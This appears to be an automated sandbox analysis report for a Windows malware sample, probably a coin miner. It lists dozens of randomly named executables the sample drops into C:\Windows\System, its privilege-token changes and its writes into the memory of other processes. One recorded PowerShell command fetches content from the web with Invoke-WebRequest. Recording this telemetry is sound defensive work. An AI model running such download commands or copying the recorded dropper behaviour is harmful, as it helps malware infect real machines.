File created C:\Windows\System\QzXmTxM.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JQueVBw.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cOQTLAf.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UwAZtMP.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lxESXJQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dAtxBwQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BlEXYxN.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wmxCtvH.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CYvYdQi.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xUakcrH.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LGvpvJc.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uNliUiO.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XkpHjEJ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TlwQEAb.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nmmQJtI.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jWrtGlQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bHgWYEM.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KjqrRfi.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XUuDeGl.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hEoVhLp.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OdeWzVJ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LKKuXpc.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rPaPCyf.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BUsoiEI.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UmdoZLo.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dpGFZrq.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aPCXTKv.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ohyJRTa.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UvSbMvy.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\udVbRBH.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vYrqssm.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dgHZlHs.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FqzWavJ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ixzhJTR.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YCTFBuz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eGUkvNR.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZkqEmBD.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lPxzrlz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CIayTVx.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 904 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 904 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\GmWDoge.exe
PID 904 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\GmWDoge.exe
PID 904 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\JbEGmIe.exe
PID 904 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\JbEGmIe.exe
PID 904 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\wEwmdoy.exe
PID 904 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\wEwmdoy.exe
PID 904 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tgXmEHn.exe
PID 904 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tgXmEHn.exe
PID 904 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bxvgoxm.exe
PID 904 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bxvgoxm.exe
PID 904 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\awMoYzi.exe
PID 904 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\awMoYzi.exe
PID 904 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\eMEsneA.exe
PID 904 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\eMEsneA.exe
PID 904 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\rlchjDO.exe
PID 904 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\rlchjDO.exe
PID 904 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UGzbyIK.exe
PID 904 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UGzbyIK.exe
PID 904 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tUslfqn.exe
PID 904 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tUslfqn.exe
PID 904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SJeRPcj.exe
PID 904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SJeRPcj.exe
PID 904 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\brNXVSb.exe
PID 904 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\brNXVSb.exe
PID 904 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WGHWgIl.exe
PID 904 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WGHWgIl.exe
PID 904 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SuQJxhP.exe
PID 904 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SuQJxhP.exe
PID 904 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\eLOOKHu.exe
PID 904 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\eLOOKHu.exe
PID 904 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\NaGyone.exe
PID 904 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\NaGyone.exe
PID 904 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\lxESXJQ.exe
PID 904 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\lxESXJQ.exe
PID 904 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\ZytymWx.exe
PID 904 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\ZytymWx.exe
PID 904 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bcvXdmk.exe
PID 904 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bcvXdmk.exe
PID 904 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aehDcHo.exe
PID 904 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aehDcHo.exe
PID 904 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QTIQIwL.exe
PID 904 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QTIQIwL.exe
PID 904 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\uZmeJel.exe
PID 904 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\uZmeJel.exe
PID 904 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QpLmxIi.exe
PID 904 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QpLmxIi.exe
PID 904 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\jsuuXpQ.exe
PID 904 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\jsuuXpQ.exe
PID 904 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\DbVxONV.exe
PID 904 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\DbVxONV.exe
PID 904 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\ehOaJVK.exe
PID 904 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\ehOaJVK.exe
PID 904 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\soJVmbm.exe
PID 904 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\soJVmbm.exe
PID 904 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QfhBUXV.exe
PID 904 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QfhBUXV.exe
PID 904 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UzWWRUE.exe
PID 904 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UzWWRUE.exe
PID 904 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\jlhULBp.exe
PID 904 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\jlhULBp.exe
PID 904 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aFUqLUM.exe
PID 904 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aFUqLUM.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\GmWDoge.exe

C:\Windows\System\GmWDoge.exe

C:\Windows\System\JbEGmIe.exe

C:\Windows\System\JbEGmIe.exe

C:\Windows\System\wEwmdoy.exe

C:\Windows\System\wEwmdoy.exe

C:\Windows\System\tgXmEHn.exe

C:\Windows\System\tgXmEHn.exe

C:\Windows\System\bxvgoxm.exe

C:\Windows\System\bxvgoxm.exe

C:\Windows\System\awMoYzi.exe

C:\Windows\System\awMoYzi.exe

C:\Windows\System\eMEsneA.exe

C:\Windows\System\eMEsneA.exe

C:\Windows\System\rlchjDO.exe

C:\Windows\System\rlchjDO.exe

C:\Windows\System\UGzbyIK.exe

C:\Windows\System\UGzbyIK.exe

C:\Windows\System\tUslfqn.exe

C:\Windows\System\tUslfqn.exe

C:\Windows\System\SJeRPcj.exe

C:\Windows\System\SJeRPcj.exe

C:\Windows\System\brNXVSb.exe

C:\Windows\System\brNXVSb.exe

C:\Windows\System\WGHWgIl.exe

C:\Windows\System\WGHWgIl.exe

C:\Windows\System\SuQJxhP.exe

C:\Windows\System\SuQJxhP.exe

C:\Windows\System\eLOOKHu.exe

C:\Windows\System\eLOOKHu.exe

C:\Windows\System\NaGyone.exe

C:\Windows\System\NaGyone.exe

C:\Windows\System\lxESXJQ.exe

C:\Windows\System\lxESXJQ.exe

C:\Windows\System\ZytymWx.exe

C:\Windows\System\ZytymWx.exe

C:\Windows\System\bcvXdmk.exe

C:\Windows\System\bcvXdmk.exe

C:\Windows\System\aehDcHo.exe

C:\Windows\System\aehDcHo.exe

C:\Windows\System\QTIQIwL.exe

C:\Windows\System\QTIQIwL.exe

C:\Windows\System\uZmeJel.exe

C:\Windows\System\uZmeJel.exe

C:\Windows\System\QpLmxIi.exe

C:\Windows\System\QpLmxIi.exe

C:\Windows\System\jsuuXpQ.exe

C:\Windows\System\jsuuXpQ.exe

C:\Windows\System\DbVxONV.exe

C:\Windows\System\DbVxONV.exe

C:\Windows\System\ehOaJVK.exe

C:\Windows\System\ehOaJVK.exe

C:\Windows\System\soJVmbm.exe

C:\Windows\System\soJVmbm.exe

C:\Windows\System\QfhBUXV.exe

C:\Windows\System\QfhBUXV.exe

C:\Windows\System\UzWWRUE.exe

C:\Windows\System\UzWWRUE.exe

C:\Windows\System\jlhULBp.exe

C:\Windows\System\jlhULBp.exe

C:\Windows\System\aFUqLUM.exe

C:\Windows\System\aFUqLUM.exe

C:\Windows\System\MEgGaFw.exe

C:\Windows\System\MEgGaFw.exe

C:\Windows\System\tMMHyLl.exe

C:\Windows\System\tMMHyLl.exe

C:\Windows\System\uEcAIXl.exe

C:\Windows\System\uEcAIXl.exe

C:\Windows\System\RZGIOmq.exe

C:\Windows\System\RZGIOmq.exe

C:\Windows\System\jTsCvzr.exe

C:\Windows\System\jTsCvzr.exe

C:\Windows\System\vTaoDND.exe

C:\Windows\System\vTaoDND.exe

C:\Windows\System\bFVKaSA.exe

C:\Windows\System\bFVKaSA.exe

C:\Windows\System\onKToCt.exe

C:\Windows\System\onKToCt.exe

C:\Windows\System\jvNrnkx.exe

C:\Windows\System\jvNrnkx.exe

C:\Windows\System\qKleYeX.exe

C:\Windows\System\qKleYeX.exe

C:\Windows\System\SJjfMjl.exe

C:\Windows\System\SJjfMjl.exe

C:\Windows\System\BQzsRrJ.exe

C:\Windows\System\BQzsRrJ.exe

C:\Windows\System\WbfDKXB.exe

C:\Windows\System\WbfDKXB.exe

C:\Windows\System\EYxBJzp.exe

C:\Windows\System\EYxBJzp.exe

C:\Windows\System\slTCRLd.exe

C:\Windows\System\slTCRLd.exe

C:\Windows\System\hqSLSTO.exe

C:\Windows\System\hqSLSTO.exe

C:\Windows\System\vLCuOpI.exe

C:\Windows\System\vLCuOpI.exe

C:\Windows\System\WmcQxEO.exe

C:\Windows\System\WmcQxEO.exe

C:\Windows\System\lkvkivn.exe

C:\Windows\System\lkvkivn.exe

C:\Windows\System\JjZmpng.exe

C:\Windows\System\JjZmpng.exe

C:\Windows\System\iCJqcME.exe

C:\Windows\System\iCJqcME.exe

C:\Windows\System\NNaIjhk.exe

C:\Windows\System\NNaIjhk.exe

C:\Windows\System\JOVOYWp.exe

C:\Windows\System\JOVOYWp.exe

C:\Windows\System\aTeYxBX.exe

C:\Windows\System\aTeYxBX.exe

C:\Windows\System\uTBtxUy.exe

C:\Windows\System\uTBtxUy.exe

C:\Windows\System\UtFglni.exe

C:\Windows\System\UtFglni.exe

C:\Windows\System\bZILROj.exe

C:\Windows\System\bZILROj.exe

C:\Windows\System\DKpeyWz.exe

C:\Windows\System\DKpeyWz.exe

C:\Windows\System\pqZpOAO.exe

C:\Windows\System\pqZpOAO.exe

C:\Windows\System\CeXqcdH.exe

C:\Windows\System\CeXqcdH.exe

C:\Windows\System\tQsXGkI.exe

C:\Windows\System\tQsXGkI.exe

C:\Windows\System\SgvgDiX.exe

C:\Windows\System\SgvgDiX.exe

C:\Windows\System\kpImApH.exe

C:\Windows\System\kpImApH.exe

C:\Windows\System\JtqcBVi.exe

C:\Windows\System\JtqcBVi.exe

C:\Windows\System\zAukPvD.exe

C:\Windows\System\zAukPvD.exe

C:\Windows\System\vRPErdp.exe

C:\Windows\System\vRPErdp.exe

C:\Windows\System\ZuiOnFB.exe

C:\Windows\System\ZuiOnFB.exe

C:\Windows\System\LmiFzoG.exe

C:\Windows\System\LmiFzoG.exe

C:\Windows\System\kyUhqkU.exe

C:\Windows\System\kyUhqkU.exe

C:\Windows\System\pYZqavt.exe

C:\Windows\System\pYZqavt.exe

C:\Windows\System\NBFNHkh.exe

C:\Windows\System\NBFNHkh.exe

C:\Windows\System\ietJpgY.exe

C:\Windows\System\ietJpgY.exe

C:\Windows\System\gloQrWO.exe

C:\Windows\System\gloQrWO.exe

C:\Windows\System\TllsTyR.exe

C:\Windows\System\TllsTyR.exe

C:\Windows\System\kaAiLed.exe

C:\Windows\System\kaAiLed.exe

C:\Windows\System\jBMXnzb.exe

C:\Windows\System\jBMXnzb.exe

C:\Windows\System\yRFjPdO.exe

C:\Windows\System\yRFjPdO.exe

C:\Windows\System\yHmFNQT.exe

C:\Windows\System\yHmFNQT.exe

C:\Windows\System\wrBwbye.exe

C:\Windows\System\wrBwbye.exe

C:\Windows\System\EwaHqYH.exe

C:\Windows\System\EwaHqYH.exe

C:\Windows\System\RfWjRXu.exe

C:\Windows\System\RfWjRXu.exe

C:\Windows\System\xifpMXV.exe

C:\Windows\System\xifpMXV.exe

C:\Windows\System\lPxzrlz.exe

C:\Windows\System\lPxzrlz.exe

C:\Windows\System\cXcYUUx.exe

C:\Windows\System\cXcYUUx.exe

C:\Windows\System\tAgcZql.exe

C:\Windows\System\tAgcZql.exe

C:\Windows\System\pbfruJH.exe

C:\Windows\System\pbfruJH.exe

C:\Windows\System\zXeVkwe.exe

C:\Windows\System\zXeVkwe.exe

C:\Windows\System\TFeGfZn.exe

C:\Windows\System\TFeGfZn.exe

C:\Windows\System\ohyJRTa.exe

C:\Windows\System\ohyJRTa.exe

C:\Windows\System\UTEnEeN.exe

C:\Windows\System\UTEnEeN.exe

C:\Windows\System\ccPlhXa.exe

C:\Windows\System\ccPlhXa.exe

C:\Windows\System\AyXCica.exe

C:\Windows\System\AyXCica.exe

C:\Windows\System\FSwcVwo.exe

C:\Windows\System\FSwcVwo.exe

C:\Windows\System\LGvpvJc.exe

C:\Windows\System\LGvpvJc.exe

C:\Windows\System\czlPuFP.exe

C:\Windows\System\czlPuFP.exe

C:\Windows\System\kxGHZwY.exe

C:\Windows\System\kxGHZwY.exe

C:\Windows\System\VdVKqzj.exe

C:\Windows\System\VdVKqzj.exe

C:\Windows\System\luSiWFS.exe

C:\Windows\System\luSiWFS.exe

C:\Windows\System\YsOWgUI.exe

C:\Windows\System\YsOWgUI.exe

C:\Windows\System\aqGTvQC.exe

C:\Windows\System\aqGTvQC.exe

C:\Windows\System\BmzXKEx.exe

C:\Windows\System\BmzXKEx.exe

C:\Windows\System\NUQQCkv.exe

C:\Windows\System\NUQQCkv.exe

C:\Windows\System\ujmzVKh.exe

C:\Windows\System\ujmzVKh.exe

C:\Windows\System\qzHSyIn.exe

C:\Windows\System\qzHSyIn.exe

C:\Windows\System\xHpZYeX.exe

C:\Windows\System\xHpZYeX.exe

C:\Windows\System\yycBtkD.exe

C:\Windows\System\yycBtkD.exe

C:\Windows\System\eEWHINx.exe

C:\Windows\System\eEWHINx.exe

C:\Windows\System\PDOXCbA.exe

C:\Windows\System\PDOXCbA.exe

C:\Windows\System\yFwZzlu.exe

C:\Windows\System\yFwZzlu.exe

C:\Windows\System\daKJOBH.exe

C:\Windows\System\daKJOBH.exe

C:\Windows\System\emvqNfo.exe

C:\Windows\System\emvqNfo.exe

C:\Windows\System\dAtxBwQ.exe

C:\Windows\System\dAtxBwQ.exe

C:\Windows\System\vRkmqRM.exe

C:\Windows\System\vRkmqRM.exe

C:\Windows\System\cZJxqFK.exe

C:\Windows\System\cZJxqFK.exe

C:\Windows\System\yZIFoiO.exe

C:\Windows\System\yZIFoiO.exe

C:\Windows\System\Nvtyfld.exe

C:\Windows\System\Nvtyfld.exe

C:\Windows\System\QrektPt.exe

C:\Windows\System\QrektPt.exe

C:\Windows\System\FbbKZvS.exe

C:\Windows\System\FbbKZvS.exe

C:\Windows\System\IaNINEE.exe

C:\Windows\System\IaNINEE.exe

C:\Windows\System\ugnaZZG.exe

C:\Windows\System\ugnaZZG.exe

C:\Windows\System\NDehAXB.exe

C:\Windows\System\NDehAXB.exe

C:\Windows\System\OEOQxxO.exe

C:\Windows\System\OEOQxxO.exe

C:\Windows\System\DMwuGKR.exe

C:\Windows\System\DMwuGKR.exe

C:\Windows\System\HNibsaV.exe

C:\Windows\System\HNibsaV.exe

C:\Windows\System\laVNLqw.exe

C:\Windows\System\laVNLqw.exe

C:\Windows\System\gwZfUrj.exe

C:\Windows\System\gwZfUrj.exe

C:\Windows\System\zqulwMI.exe

C:\Windows\System\zqulwMI.exe

C:\Windows\System\DJYTxiN.exe

C:\Windows\System\DJYTxiN.exe

C:\Windows\System\ohXHDIV.exe

